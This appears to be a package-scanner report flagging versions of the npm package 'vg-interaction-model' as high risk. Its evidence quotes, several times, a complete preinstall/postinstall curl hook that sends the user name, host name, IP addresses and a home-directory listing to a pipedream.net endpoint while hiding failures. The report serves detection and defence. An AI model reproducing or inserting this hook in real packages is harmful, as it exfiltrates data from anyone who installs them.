npm · registry.npmjs.org
vg-interaction-model
Install Lifecycle Repeated Payload: preinstall,postinstall="curl -s \"https://eof85dbndyyqbi1.m.pipedream.net/vg-interaction-model/?user=$(whoami)&host=$(hostname)&dir=$PWD&ip=$(curl -s https:/ipinfo.io/ip)&l-ip=$(hostname -i)&time=$(date +%s)\" && curl -X POST -d \"data=$(cd;ls -la)\" https://eof85dbndyyqbi1.m.pipedream.net/home-dir > /dev/null || true"
Why PkgRadar flagged 40.0.5
| Severity | Signal | Evidence |
|---|---|---|
| high | Install Lifecycle Repeated Payload | preinstall,postinstall="curl -s \"https://eof85dbndyyqbi1.m.pipedream.net/vg-interaction-model/?user=$(whoami)&host=$(hostname)&dir=$PWD&ip=$(curl -s https:/ipinfo.io/ip)&l-ip=$(hostname -i)&time=$(date +%s)\" && curl -X POST -d \"data=$(cd;ls -la)\" https://eof85dbndyyqbi1.m.pipedream.net/home-dir > /dev/null || true" · package.json |
| high | Install Lifecycle Suppresses Failure | preinstall="curl -s \"https://eof85dbndyyqbi1.m.pipedream.net/vg-interaction-model/?user=$(whoami)&host=$(hostname)&dir=$PWD&ip=$(curl -s https:/ipinfo.io/ip)&l-ip=$(hostname -i)&time=$(date +%s)\" && curl -X POST -d \"data=$(cd;ls -la)\" https://eof85dbndyyqbi1.m.pipedream.net/home-dir > /dev/null || true" · package.json |
| high | Install Lifecycle Suppresses Failure | postinstall="curl -s \"https://eof85dbndyyqbi1.m.pipedream.net/vg-interaction-model/?user=$(whoami)&host=$(hostname)&dir=$PWD&ip=$(curl -s https:/ipinfo.io/ip)&l-ip=$(hostname -i)&time=$(date +%s)\" && curl -X POST -d \"data=$(cd;ls -la)\" https://eof85dbndyyqbi1.m.pipedream.net/home-dir > /dev/null || true" · package.json |
Scanned versions
| Version | Verdict | Score | Scanned (UTC) |
|---|---|---|---|
0.0.1-security | Low risk | 0 | 2026-06-03 |
40.0.5 | High risk | 75 | 2026-06-03 |
40.0.6 | High risk | 75 | 2026-06-03 |
40.0.3 | High risk | 75 | 2026-06-03 |
40.0.4 | High risk | 75 | 2026-06-03 |
40.0.2 | High risk | 75 | 2026-06-03 |
40.0.1 | High risk | 75 | 2026-06-03 |
Block this in CI
pkgradar gate --ecosystem npm [email protected]